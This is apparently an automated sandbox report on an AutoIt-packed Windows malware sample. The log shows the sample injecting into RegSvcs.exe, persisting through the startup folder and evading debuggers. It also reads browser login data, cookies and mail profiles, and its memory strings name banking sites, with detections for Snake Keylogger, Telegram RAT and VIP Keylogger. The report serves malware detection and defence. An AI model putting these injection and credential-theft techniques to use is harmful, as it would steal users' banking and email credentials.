                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594981Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594873Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594000Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: RegSvcs.exe, 00000003.00000002.3369425825.0000000000E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: RegSvcs.exe, 00000009.00000002.3369147970.000000000121A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllna
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: RegSvcs.exe, 00000009.00000002.3372995128.000000000426F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064F9548 LdrInitializeThunk,3_2_064F9548
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2EAA2 BlockInput,0_2_00B2EAA2
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AE2622
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AB42DE
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD4CE8 mov eax, dword ptr fs:[00000030h]0_2_00AD4CE8
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_0180EFD8 mov eax, dword ptr fs:[00000030h]0_2_0180EFD8
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_0180EF78 mov eax, dword ptr fs:[00000030h]0_2_0180EF78
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_0180D928 mov eax, dword ptr fs:[00000030h]0_2_0180D928
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00904CE8 mov eax, dword ptr fs:[00000030h]2_2_00904CE8
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0139F518 mov eax, dword ptr fs:[00000030h]2_2_0139F518
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0139F4B8 mov eax, dword ptr fs:[00000030h]2_2_0139F4B8
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0139DE68 mov eax, dword ptr fs:[00000030h]2_2_0139DE68
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 8_2_017BEFE8 mov eax, dword ptr fs:[00000030h]8_2_017BEFE8
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 8_2_017BF048 mov eax, dword ptr fs:[00000030h]8_2_017BF048
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 8_2_017BD998 mov eax, dword ptr fs:[00000030h]8_2_017BD998
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B10B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B10B62
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AE2622
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD083F
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD09D5 SetUnhandledExceptionFilter,0_2_00AD09D5
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AD0C21
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00912622
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0090083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0090083F
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009009D5 SetUnhandledExceptionFilter,2_2_009009D5
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00900C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00900C21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 85B008Jump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E38008Jump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B11201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B11201
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AF2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AF2BA5
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1B226 SendInput,keybd_event,0_2_00B1B226
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B322DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00B322DA
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RubzLi27lr.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Hegeleos\spadixes.exe" Jump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B10B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B10B62
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B11663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B11663
                Source: RubzLi27lr.exe, spadixes.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: RubzLi27lr.exe, spadixes.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AD0698 cpuid 0_2_00AD0698
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B28195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00B28195
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B0D27A GetUserNameW,0_2_00B0D27A
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AEB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00AEB952
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AB42DE
                Source: C:\Users\user\Desktop\RubzLi27lr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: spadixes.exeBinary or memory string: WIN_81
                Source: spadixes.exeBinary or memory string: WIN_XP
                Source: spadixes.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: spadixes.exeBinary or memory string: WIN_XPe
                Source: spadixes.exeBinary or memory string: WIN_VISTA
                Source: spadixes.exeBinary or memory string: WIN_7
                Source: spadixes.exeBinary or memory string: WIN_8
